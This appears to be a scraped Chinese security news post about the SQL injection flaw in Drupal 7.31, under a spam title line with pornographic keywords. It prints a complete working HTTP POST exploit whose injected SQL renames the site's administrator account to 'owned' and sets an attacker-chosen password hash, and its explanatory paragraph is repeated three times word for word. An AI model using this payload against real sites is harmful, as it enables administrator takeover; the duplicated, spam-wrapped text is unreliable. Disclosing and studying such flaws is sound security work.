亚洲日本免费-啊轻点灬太粗太长了三男一女-麻豆av电影在线观看-日韩一级片毛片|www.grbbt.com

Drupal 7.31版本爆嚴(yán)重SQL注入漏洞

  今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并給出了利用測試的EXP代碼,小編在本地搭建Drupal7.31的環(huán)境,經(jīng)過測試,發(fā)現(xiàn)該利用代碼可成功執(zhí)行并在數(shù)據(jù)庫中增加一個(gè)攻擊者自定義的用戶。

  測試代碼:(請勿用于非法用途)

  POST /drupal-7.31/?q=node&destination=node HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/drupal-7.31/Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 231name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in本地環(huán)境測試效果:

  今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并給出了利用測試的EXP代碼,小編在本地搭建Drupal7.31的環(huán)境,經(jīng)過測試,發(fā)現(xiàn)該利用代碼可成功執(zhí)行并在數(shù)據(jù)庫中增加一個(gè)攻擊者自定義的用戶。

  今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并給出了利用測試的EXP代碼,小編在本地搭建Drupal7.31的環(huán)境,經(jīng)過測試,發(fā)現(xiàn)該利用代碼可成功執(zhí)行并在數(shù)據(jù)庫中增加一個(gè)攻擊者自定義的用戶。

  請相關(guān)廠商關(guān)注,并盡快修復(fù)漏洞。

 

上一篇:智能無懼挑戰(zhàn) 山石網(wǎng)科轟動RSA2015

下一篇:深度剖析高級網(wǎng)絡(luò)攻擊